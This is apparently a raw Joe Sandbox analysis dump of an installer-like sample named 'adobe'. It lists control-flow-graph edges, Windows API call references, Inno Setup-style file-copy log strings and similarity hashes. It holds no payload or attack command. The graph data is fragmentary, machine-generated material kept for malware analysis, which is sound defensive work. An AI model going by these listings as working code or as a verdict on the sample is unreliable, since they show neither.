calls 51251->51258 51259 403400 4 API calls 51252->51259 51262 479ff7 51253->51262 51263 479fe4 51253->51263 51260 403494 4 API calls 51254->51260 51256->51469 51258->51469 51261 47a868 51259->51261 51260->51469 51261->51234 51265 47a047 51262->51265 51266 47a005 51262->51266 51264 403494 4 API calls 51263->51264 51264->51469 51273 47a055 51265->51273 51274 47a068 51265->51274 51267 47a021 51266->51267 51268 47a00e 51266->51268 51269 47a034 51267->51269 51483 4529b4 18 API calls 51267->51483 51270 403494 4 API calls 51268->51270 51272 403494 4 API calls 51269->51272 51270->51469 51272->51469 51275 403494 4 API calls 51273->51275 51276 47a076 51274->51276 51277 47a089 51274->51277 51275->51469 51278 403494 4 API calls 51276->51278 51279 47a097 51277->51279 51280 47a0aa 51277->51280 51278->51469 51281 403494 4 API calls 51279->51281 51282 47a0cb 51280->51282 51283 47a0b8 51280->51283 51281->51469 51285 47a0d9 51282->51285 51286 47a108 51282->51286 51284 403494 4 API calls 51283->51284 51284->51469 51287 47a0f5 51285->51287 51288 47a0e2 51285->51288 51291 47a116 51286->51291 51292 47a145 51286->51292 51290 403494 4 API calls 51287->51290 51289 403494 4 API calls 51288->51289 51289->51469 51290->51469 51293 47a132 51291->51293 51294 47a11f 51291->51294 51297 47a166 51292->51297 51298 47a153 51292->51298 51295 403494 4 API calls 51293->51295 51296 403494 4 API calls 51294->51296 51295->51469 51296->51469 51300 47a187 51297->51300 51301 47a174 51297->51301 51299 403494 4 API calls 51298->51299 51299->51469 51303 47a195 51300->51303 51304 47a1c0 51300->51304 51302 403494 4 API calls 51301->51302 51302->51469 51305 47a1b1 51303->51305 51306 47a19e 51303->51306 51309 47a1ce 51304->51309 51310 47a1f9 51304->51310 51484 4529b4 18 API calls 51305->51484 51307 403494 4 API calls 51306->51307 51307->51469 51311 47a1d7 51309->51311 51312 47a1ea 51309->51312 51315 47a207 51310->51315 51316 47a219 51310->51316 51469->51249 51470->51234 51472 403804 51471->51472 51474 40382f 
51471->51474 51473 4038a4 18 API calls 51472->51473 51473->51474 51474->51234 51475->51234 51480->51240 51481->51250 51482->51251 51483->51269 51484->51469 51550->51213 51552 47c7ac 51551->51552 51555 47c776 51551->51555 51553 403420 4 API calls 51552->51553 51554 47c8c0 51553->51554 51554->50676 51594 455238 51555->51594 51557 47c889 51557->50676 51560 47c7a0 51560->51552 51560->51557 51562 47af6c 57 API calls 51560->51562 51566 47c835 51560->51566 51601 47838c 51560->51601 51612 4784f0 51560->51612 51616 47c310 45 API calls 51560->51616 51561 47af6c 57 API calls 51561->51566 51562->51560 51563 42c8f8 19 API calls 51563->51566 51565 42c920 19 API calls 51565->51566 51566->51560 51566->51561 51566->51563 51566->51565 51568 47c876 51566->51568 51617 47c458 72 API calls 51566->51617 51568->51552 51679 465f28 51569->51679 51572->50685 51574 42f3e0 51573->51574 51575 42f403 GetActiveWindow GetFocus 51574->51575 51576 41eeb4 2 API calls 51575->51576 51577 42f41a 51576->51577 51578 42f437 51577->51578 51579 42f427 RegisterClassA 51577->51579 51580 42f4c6 SetFocus 51578->51580 51581 42f445 CreateWindowExA 51578->51581 51579->51578 51583 403400 4 API calls 51580->51583 51581->51580 51582 42f478 51581->51582 51710 42428c 51582->51710 51585 42f4e2 51583->51585 51589 4935a0 32 API calls 51585->51589 51586 42f4a0 51587 42f4a8 CreateWindowExA 51586->51587 51587->51580 51588 42f4be ShowWindow 51587->51588 51588->51580 51589->50707 51716 44ad68 51590->51716 51595 455249 51594->51595 51596 455256 51595->51596 51597 45524d 51595->51597 51626 45501c 43 API calls 51596->51626 51618 454f3c 51597->51618 51600 455253 51600->51560 51602 4783a2 51601->51602 51603 47839e 51601->51603 51604 403450 18 API calls 51602->51604 51603->51560 51605 4783af 51604->51605 51606 4783b5 51605->51606 51607 4783cf 51605->51607 51655 47824c 51606->51655 51609 47824c 33 API calls 51607->51609 51610 4783cb 51609->51610 51611 403400 4 API calls 51610->51611 51611->51603 51613 4784fc 51612->51613 51614 478517 
51613->51614 51678 4529b4 18 API calls 51613->51678 51614->51560 51616->51560 51617->51566 51627 42dd44 51618->51627 51620 454f59 51621 454fa7 51620->51621 51630 454e70 51620->51630 51621->51600 51624 454e70 20 API calls 51625 454f88 RegCloseKey 51624->51625 51625->51600 51626->51600 51628 42dd55 RegOpenKeyExA 51627->51628 51629 42dd4f 51627->51629 51628->51620 51629->51628 51635 42dc80 51630->51635 51632 403420 4 API calls 51633 454f22 51632->51633 51633->51624 51634 454e98 51634->51632 51638 42db28 51635->51638 51639 42db4e RegQueryValueExA 51638->51639 51645 42db71 51639->51645 51654 42db93 51639->51654 51640 403400 4 API calls 51642 42dc5f 51640->51642 51641 42db8b 51643 403400 4 API calls 51641->51643 51642->51634 51643->51654 51644 4034e0 18 API calls 51644->51645 51645->51641 51645->51644 51646 403744 18 API calls 51645->51646 51645->51654 51647 42dbc8 RegQueryValueExA 51646->51647 51647->51639 51648 42dbe4 51647->51648 51649 4038a4 18 API calls 51648->51649 51648->51654 51650 42dc26 51649->51650 51651 42dc38 51650->51651 51653 403744 18 API calls 51650->51653 51652 403450 18 API calls 51651->51652 51652->51654 51653->51651 51654->51640 51656 478267 51655->51656 51658 478298 51656->51658 51659 478326 51656->51659 51673 478100 33 API calls 51656->51673 51657 4782bd 51663 4782de 51657->51663 51675 478100 33 API calls 51657->51675 51658->51657 51674 478100 33 API calls 51658->51674 51659->51610 51663->51659 51664 47831e 51663->51664 51676 4529b4 18 API calls 51663->51676 51667 477f84 51664->51667 51668 477fbf 51667->51668 51669 403450 18 API calls 51668->51669 51670 477fe4 51669->51670 51677 476674 33 API calls 51670->51677 51672 478025 51672->51659 51673->51658 51674->51657 51675->51663 51676->51664 51677->51672 51678->51614 51680 403494 4 API calls 51679->51680 51681 465f56 51680->51681 51696 42daf0 51681->51696 51684 42daf0 19 API calls 51685 465f7a 51684->51685 51686 465e14 33 API calls 51685->51686 51687 465f84 51686->51687 51688 42daf0 19 API calls 
51687->51688 51689 465f93 51688->51689 51699 465e8c 51689->51699 51692 42daf0 19 API calls 51693 465fac 51692->51693 51694 403400 4 API calls 51693->51694 51695 465fc1 51694->51695 51695->50680 51703 42da38 51696->51703 51700 465eac 51699->51700 51701 4078fc 33 API calls 51700->51701 51702 465ef6 51701->51702 51702->51692 51704 42dae3 51703->51704 51707 42da58 51703->51707 51704->51684 51705 4037b8 18 API calls 51705->51707 51707->51704 51707->51705 51708 403800 18 API calls 51707->51708 51709 42c454 IsDBCSLeadByte 51707->51709 51708->51707 51709->51707 51711 4242be 51710->51711 51712 42429e GetWindowTextA 51710->51712 51714 403494 4 API calls 51711->51714 51713 4034e0 18 API calls 51712->51713 51715 4242bc 51713->51715 51714->51715 51715->51586 51719 44abe0 51716->51719 51720 44ac13 51719->51720 51721 414af8 18 API calls 51720->51721 51722 44ac26 51721->51722 51723 40357c 18 API calls 51722->51723 51724 44ac53 73A1A570 51722->51724 51723->51724 51730 41a1f8 51724->51730 51727 44ac84 51738 44a914 51727->51738 51731 41a223 51730->51731 51732 41a2bf 51730->51732 51749 403520 51731->51749 51733 403400 4 API calls 51732->51733 51734 41a2d7 SelectObject 51733->51734 51734->51727 51736 41a27b 51737 41a2b3 CreateFontIndirectA 51736->51737 51737->51732 51739 44a92b 51738->51739 51740 44a9be 51739->51740 51741 44a93e 51739->51741 51742 44a9a7 51739->51742 51741->51740 51750 4034e0 18 API calls 51749->51750 51751 40352a 51750->51751 51751->51736 51754 464aff 51752->51754 51753 464bda 51763 4668a0 51753->51763 51754->51753 51757 464b4f 51754->51757 51776 421a2c 51754->51776 51758 464b94 51757->51758 51759 464b89 51757->51759 51762 464b92 51757->51762 51761 421a2c 21 API calls 51758->51761 51760 421a2c 21 API calls 51759->51760 51760->51762 51761->51762 51762->51753 51782 4185c8 21 API calls 51762->51782 51764 4668d0 51763->51764 51765 4668b1 51763->51765 51764->50733 51766 414b28 18 API calls 51765->51766 51767 4668bf 51766->51767 51768 414b28 18 API calls 51767->51768 
51768->51764 51770 46a071 51769->51770 51771 421a2c 21 API calls 51770->51771 51772 46a0ca 51771->51772 51772->50759 51774 466374 32 API calls 51772->51774 51773->50736 51774->50759 51775->50760 51777 421a84 51776->51777 51778 421a3a 51776->51778 51777->51757 51781 421a69 51778->51781 51783 408cc4 51778->51783 51781->51777 51791 421d38 SetFocus GetFocus 51781->51791 51782->51753 51784 408cd0 51783->51784 51792 406df4 LoadStringA 51784->51792 51787 403450 18 API calls 51788 408d01 51787->51788 51789 403400 4 API calls 51788->51789 51790 408d16 51789->51790 51790->51781 51791->51777 51793 4034e0 18 API calls 51792->51793 51794 406e21 51793->51794 51794->51787 51796 46b929 51795->51796 51797 414af8 18 API calls 51796->51797 51807 46b976 51796->51807 51798 46b93f 51797->51798 51983 466138 20 API calls 51798->51983 51799 403420 4 API calls 51801 46ba20 51799->51801 51801->50774 51976 408be8 19 API calls 51801->51976 51802 46b947 51803 414b28 18 API calls 51802->51803 51804 46b955 51803->51804 51805 46b962 51804->51805 51808 46b97b 51804->51808 51984 47d6ec 56 API calls 51805->51984 51807->51799 51809 46b993 51808->51809 51810 46621c CharNextA 51808->51810 51985 47d6ec 56 API calls 51809->51985 51812 46b98f 51810->51812 51812->51809 51813 46b9a9 51812->51813 51814 46b9c5 51813->51814 51815 46b9af 51813->51815 51817 42c968 CharNextA 51814->51817 51986 47d6ec 56 API calls 51815->51986 51818 46b9d2 51817->51818 51818->51807 51987 4662a8 18 API calls 51818->51987 51820 46b9e9 51821 450ac8 18 API calls 51820->51821 51822 46b9f6 51821->51822 51988 47d6ec 56 API calls 51822->51988 51825 480c6f 51824->51825 51827 480c9d 51824->51827 51989 493350 32 API calls 51825->51989 51828 474b38 51827->51828 51990 457008 51828->51990 51831 4072b0 SetCurrentDirectoryA 51832 474b8e 51831->51832 52011 46d480 51832->52011 51977->50782 51983->51802 51984->51807 51985->51807 51986->51807 51987->51820 51988->51807 51989->51827 51991 457034 51990->51991 52006 45713c 51990->52006 52531 456d04 
GetSystemTimeAsFileTime FileTimeToSystemTime 51991->52531 51992 45718d 51994 403400 4 API calls 51992->51994 51997 4571a2 51994->51997 51995 45703c 51998 4078fc 33 API calls 51995->51998 51997->51831 51999 4570ad 51998->51999 52532 456ff8 34 API calls 51999->52532 52001 457132 52534 456ff8 34 API calls 52001->52534 52002 457103 52002->52001 52008 403778 18 API calls 52002->52008 52003 403778 18 API calls 52005 4570b5 52003->52005 52005->52002 52005->52003 52007 456ff8 34 API calls 52005->52007 52006->51992 52535 456874 20 API calls 52006->52535 52007->52005 52009 45712a 52008->52009 52012 46d4f3 52011->52012 52014 46d49d 52011->52014 52015 46d4f8 52012->52015 52013 47838c 33 API calls 52013->52014 52014->52012 52014->52013 52016 46d51e 52015->52016 52531->51995 52532->52005 52534->52006 52535->51992 53723 431740 53684->53723 53686 403400 4 API calls 53687 43d2ca 53686->53687 53687->50841 53687->50842 53688 43d246 53688->53686 53690 43142a 53689->53690 53691 402648 18 API calls 53690->53691 53692 43145a 53691->53692 53693 492e5c 53692->53693 53694 492f31 53693->53694 53698 492e76 53693->53698 53700 492f74 53694->53700 53696 4335c0 18 API calls 53696->53698 53698->53694 53698->53696 53699 403450 18 API calls 53698->53699 53728 408c14 18 API calls 53698->53728 53729 4314f4 53698->53729 53699->53698 53701 492f90 53700->53701 53737 4335c0 53701->53737 53703 492f95 53704 4314f4 18 API calls 53703->53704 53705 492fa0 53704->53705 53706 43cde8 53705->53706 53707 43ce15 53706->53707 53712 43ce07 53706->53712 53707->50852 53708 43ce91 53716 43cf4b 53708->53716 53740 4468d8 53708->53740 53710 43cedc 53746 43d5a4 53710->53746 53712->53707 53712->53708 53713 4468d8 18 API calls 53712->53713 53713->53712 53714 43d151 53714->53707 53766 446878 18 API calls 53714->53766 53716->53714 53717 43d132 53716->53717 53764 446878 18 API calls 53716->53764 53765 446878 18 API calls 53717->53765 53720->50854 53721->50856 53722->50843 53724 403494 4 API calls 53723->53724 53727 43174f 
53724->53727 53725 431779 53725->53688 53726 403744 18 API calls 53726->53727 53727->53725 53727->53726 53728->53698 53730 431502 53729->53730 53731 431514 53729->53731 53735 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53730->53735 53733 431536 53731->53733 53736 431494 18 API calls 53731->53736 53733->53698 53735->53731 53736->53733 53738 402648 18 API calls 53737->53738 53739 4335cf 53738->53739 53739->53703 53741 4468f7 53740->53741 53742 4468fe 53740->53742 53767 446684 18 API calls 53741->53767 53743 4314f4 18 API calls 53742->53743 53745 44690e 53743->53745 53745->53710 53747 43d5c0 53746->53747 53752 43d5ed 53746->53752 53748 402660 4 API calls 53747->53748 53747->53752 53748->53747 53749 43d622 53749->53716 53751 43f6f9 53751->53749 53772 446878 18 API calls 53751->53772 53752->53749 53752->53751 53754 43336c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53752->53754 53755 43c18c 18 API calls 53752->53755 53756 446878 18 API calls 53752->53756 53760 43356c 18 API calls 53752->53760 53761 435ea4 18 API calls 53752->53761 53762 431494 18 API calls 53752->53762 53763 446684 18 API calls 53752->53763 53768 4366a0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53752->53768 53769 438f34 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53752->53769 53770 43d49c 32 API calls 53752->53770 53771 433588 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53752->53771 53754->53752 53755->53752 53756->53752 53760->53752 53761->53752 53762->53752 53763->53752 53764->53716 53765->53714 53766->53714 53767->53742 53768->53752 53769->53752 53770->53752 53771->53752 53772->53751 53773 416b52 53774 416bfa 53773->53774 53775 416b6a 53773->53775 53792 41532c 18 API calls 53774->53792 53777 416b84 SendMessageA 53775->53777 53778 416b78 53775->53778 53779 416bd8 53777->53779 53780 416b82 CallWindowProcA 53778->53780 53781 416b9e 53778->53781 53780->53779 53789 41a068 GetSysColor 53781->53789 53784 416ba9 SetTextColor 53785 416bbe 53784->53785 53790 41a068 GetSysColor 
53785->53790 53787 416bc3 SetBkColor 53791 41a6f0 GetSysColor CreateBrushIndirect 53787->53791 53789->53784 53790->53787 53791->53779 53792->53779 54251 40ce34 54254 406f18 WriteFile 54251->54254 54255 406f35 54254->54255 53793 416654 53794 416661 53793->53794 53795 4166bb 53793->53795 53800 416560 CreateWindowExA 53794->53800 53796 416668 SetPropA SetPropA 53796->53795 53797 41669b 53796->53797 53798 4166ae SetWindowPos 53797->53798 53798->53795 53800->53796 53801 490e9c 53802 490ed0 53801->53802 53803 490ed2 53802->53803 53804 490ee6 53802->53804 53937 4467f0 32 API calls 53803->53937 53807 490f22 53804->53807 53808 490ef5 53804->53808 53806 490edb Sleep 53910 490f59 53806->53910 53813 490f5e 53807->53813 53814 490f31 53807->53814 53809 44684c 32 API calls 53808->53809 53811 490f04 53809->53811 53810 403420 4 API calls 53812 491390 53810->53812 53815 490f0c FindWindowA 53811->53815 53819 490f6d 53813->53819 53820 490fb4 53813->53820 53816 44684c 32 API calls 53814->53816 53817 446acc 19 API calls 53815->53817 53818 490f3e 53816->53818 53919 490f1d 53817->53919 53821 490f46 FindWindowA 53818->53821 53938 4467f0 32 API calls 53819->53938 53825 491010 53820->53825 53826 490fc3 53820->53826 53823 446acc 19 API calls 53821->53823 53823->53910 53824 490f79 53939 4467f0 32 API calls 53824->53939 53832 49106c 53825->53832 53833 49101f 53825->53833 53942 4467f0 32 API calls 53826->53942 53829 490f86 53940 4467f0 32 API calls 53829->53940 53830 490fcf 53943 4467f0 32 API calls 53830->53943 53843 49107b 53832->53843 53844 4910a6 53832->53844 53947 4467f0 32 API calls 53833->53947 53835 490f93 53941 4467f0 32 API calls 53835->53941 53837 490fdc 53944 4467f0 32 API calls 53837->53944 53839 49102b 53948 4467f0 32 API calls 53839->53948 53841 490f9e SendMessageA 53842 446acc 19 API calls 53841->53842 53842->53919 53847 44684c 32 API calls 53843->53847 53854 4910b5 53844->53854 53855 4910f4 53844->53855 53846 490fe9 53945 4467f0 32 API calls 53846->53945 53850 491088 
control_flow_graph (continuation of the preceding functions' graphs; node and edge rendering data omitted). API-call nodes named in the omitted edge lists: RegisterClipboardFormatA, PostMessageA, SendNotifyMessageA, SendMessageA, GetLastError, GetProcAddress, FreeLibrary, CreateMutexA, OemToCharBuffA, CharToOemBuffA, SetErrorMode, NtdllDefWindowProc_A, GetMenuItemCount, GetMenuStringA, GetMenuState, GetMenu, SetMenu, LocalAlloc, TlsSetValue, TlsGetValue, GetModuleHandleA, GetCommandLineA, SetProcessDEPPolicy, GetVersionExA, GetCurrentThreadId, GetVersion, GetSystemDefaultLCID, GetClassInfoA, GetWindowsDirectoryA, GetSystemDirectoryA, RegOpenKeyExA, RegCloseKey, GetEnvironmentVariableA, GlobalHandle, GlobalUnWire, GlobalFree, GlobalAlloc, GlobalFix, GlobalReAlloc.
Strings
• User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 0046FFDE
• Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 0046FE0C
• User opted not to overwrite the existing file. Skipping., xrefs: 0046FF95
• Dest file is protected by Windows File Protection., xrefs: 0046FA35
• Incrementing shared file count (32-bit)., xrefs: 004706C6
• InUn, xrefs: 0047028D
• Time stamp of existing file: (failed to read), xrefs: 0046FB7F
• Couldn't read time stamp. Skipping., xrefs: 0046FE7D
• Installing the file., xrefs: 00470051
• Non-default bitness: 32-bit, xrefs: 0046FA03
• Version of our file: %u.%u.%u.%u, xrefs: 0046FC38
• Non-default bitness: 64-bit, xrefs: 0046F9F7
• Time stamp of existing file: %s, xrefs: 0046FB73
• Existing file is a newer version. Skipping., xrefs: 0046FD4A
• Will register the file (a type library) later., xrefs: 00470634
• .tmp, xrefs: 004700FF
• Dest file exists., xrefs: 0046FB03
• Time stamp of our file: %s, xrefs: 0046FAE3
• Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 0046FE18
• Version of existing file: (none), xrefs: 0046FE42
• Skipping due to "onlyifdestfileexists" flag., xrefs: 00470042
• Failed to strip read-only attribute., xrefs: 0047001B
• Installing into GAC, xrefs: 00470835
• Version of existing file: %u.%u.%u.%u, xrefs: 0046FCC4
• Version of our file: (none), xrefs: 0046FC44
• Time stamp of our file: (failed to read), xrefs: 0046FAEF
• Stripped read-only attribute., xrefs: 0047000F
• Will register the file (a DLL/OCX) later., xrefs: 00470640
• Dest filename: %s, xrefs: 0046F9DC
• , xrefs: 0046FD17, 0046FEE8, 0046FF66
• Same version. Skipping., xrefs: 0046FE2D
• Existing file has a later time stamp. Skipping., xrefs: 0046FF17
• -- File entry --, xrefs: 0046F843
• Existing file's SHA-1 hash matches our file. Skipping., xrefs: 0046FDFD
• @, xrefs: 0046F8F8
• Incrementing shared file count (64-bit)., xrefs: 004706AD
• Existing file is protected by Windows File Protection. Skipping., xrefs: 0046FF34
• Uninstaller requires administrator: %s, xrefs: 004702BD
• Skipping due to "onlyifdoesntexist" flag., xrefs: 0046FB16
• Same time stamp. Skipping., xrefs: 0046FE9D
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID:
• String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing into GAC$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
• API String ID: 0-4021121268
• Opcode ID: d0b5c9680b511a15ce8a8888be78a2c607874e5c32b26c092d6d1703eba18a82
• Instruction ID: e8792a80d11ba53c366901de372cfc6d7401bc2553ef03097421f90694f1f82e
• Opcode Fuzzy Hash: d0b5c9680b511a15ce8a8888be78a2c607874e5c32b26c092d6d1703eba18a82
• Instruction Fuzzy Hash: 19927230A04248DFCB11DFA5D445BDDBBB5AF05308F5480ABE848BB392D7789E49CB5A
Uniqueness
• Uniqueness Score: -1.00%
Control-flow Graph
• Executed
• Not Executed
control_flow_graph (rendering data omitted): basic blocks 42dfc4-42e1b7; API-call nodes in the graph: AllocateAndInitializeSid, GetVersion, GetModuleHandleA, GetProcAddress, CheckTokenMembership, GetCurrentThread, OpenThreadToken, GetLastError, GetCurrentProcess, OpenProcessToken, GetTokenInformation, EqualSid, CloseHandle, FreeSid.
APIs
• AllocateAndInitializeSid.ADVAPI32(00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042DFFE
• GetVersion.KERNEL32(00000000,0042E1A8,?,00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E01B
• GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E1A8,?,00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E034
• GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E03A
• CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E1A8,?,00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E04F
• FreeSid.ADVAPI32(00000000,0042E1AF,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E1A2
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
                                                                                                                                                          • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                          • API String ID: 2252812187-1888249752
                                                                                                                                                          • Opcode ID: d105dc908bc0adffe750a261d75f2fb918e24e77c14577ae5efca0af878be54f
                                                                                                                                                          • Instruction ID: 81e9a68d7eb5b753086264e3ea48cb09d3699a943d7b2bc0788aba7922d59162
                                                                                                                                                          • Opcode Fuzzy Hash: d105dc908bc0adffe750a261d75f2fb918e24e77c14577ae5efca0af878be54f
                                                                                                                                                          • Instruction Fuzzy Hash: DE51B271B40625AEEB10EAF69C42BBF77ACDB09704F54047BB900F7282D5BC89158A69
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 46663b6db67648ed267530da3886890c39e36ee4c42744e02747fab3d2fd9775
                                                                                                                                                          • Instruction ID: b8faa7015d3197e79f6d1719c020e5f6697e37216349d11362fcbf3b9a892ac2
                                                                                                                                                          • Opcode Fuzzy Hash: 46663b6db67648ed267530da3886890c39e36ee4c42744e02747fab3d2fd9775
                                                                                                                                                          • Instruction Fuzzy Hash: 42E1A230700125EFD704EF69E989A6EB7B5EF94304F9480A6E545AB352C73CEE91DB08
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00493F30: GetWindowRect.USER32(00000000), ref: 00493F46
                                                                                                                                                          • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 00466F87
                                                                                                                                                            • Part of subcall function 0041D6C0: GetObjectA.GDI32(?,00000018,00466FA1), ref: 0041D6EB
                                                                                                                                                            • Part of subcall function 00466994: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00466A37
                                                                                                                                                            • Part of subcall function 00466994: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00466A5D
                                                                                                                                                            • Part of subcall function 00466994: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 00466AB4
                                                                                                                                                            • Part of subcall function 00466354: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,0046703C,00000000,00000000,00000000,0000000C,00000000), ref: 0046636C
                                                                                                                                                            • Part of subcall function 004941B4: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 004941BE
                                                                                                                                                            • Part of subcall function 0042EBAC: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EC1C
                                                                                                                                                            • Part of subcall function 0042EBAC: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EC39
                                                                                                                                                            • Part of subcall function 00493E80: 73A1A570.USER32(00000000,?,?,?), ref: 00493EA2
                                                                                                                                                            • Part of subcall function 00493E80: SelectObject.GDI32(?,00000000), ref: 00493EC8
                                                                                                                                                            • Part of subcall function 00493E80: 73A1A480.USER32(00000000,?,00493F26,00493F1F,?,00000000,?,?,?), ref: 00493F19
                                                                                                                                                            • Part of subcall function 004941A4: MulDiv.KERNEL32(0000004B,?,00000006), ref: 004941AE
                                                                                                                                                          • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,0234D9AC,0234F600,?,?,0234F630,?,?,0234F680,?), ref: 00467C37
                                                                                                                                                          • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00467C48
                                                                                                                                                          • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00467C60
                                                                                                                                                            • Part of subcall function 0042A06C: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A082
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Menu$AppendExtractIconObject$A480A570AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadMessageProcRectSelectSendSystemUserWindow
                                                                                                                                                          • String ID: $(Default)$STOPIMAGE${H
                                                                                                                                                          • API String ID: 3271511185-3436354053
                                                                                                                                                          • Opcode ID: cf9293c97e3e9aca9c52ec66c160936cc4d015187b0941d35e3759e4b6dad66f
                                                                                                                                                          • Instruction ID: a6f197261a18fc9eff18fbfa3c5028089fc26a300eb1d9caf07a23dde61acc02
                                                                                                                                                          • Opcode Fuzzy Hash: cf9293c97e3e9aca9c52ec66c160936cc4d015187b0941d35e3759e4b6dad66f
                                                                                                                                                          • Instruction Fuzzy Hash: D6F2C6386005148FCB00EB59D5D9F9973F5FF49308F1542BAE5049B36ADB78AC4ACB8A
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,004741E2,?,?,0049B178,00000000), ref: 004740D1
                                                                                                                                                          • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,004741E2,?,?,0049B178,00000000), ref: 004741AE
                                                                                                                                                          • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,004741E2,?,?,0049B178,00000000), ref: 004741BC
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
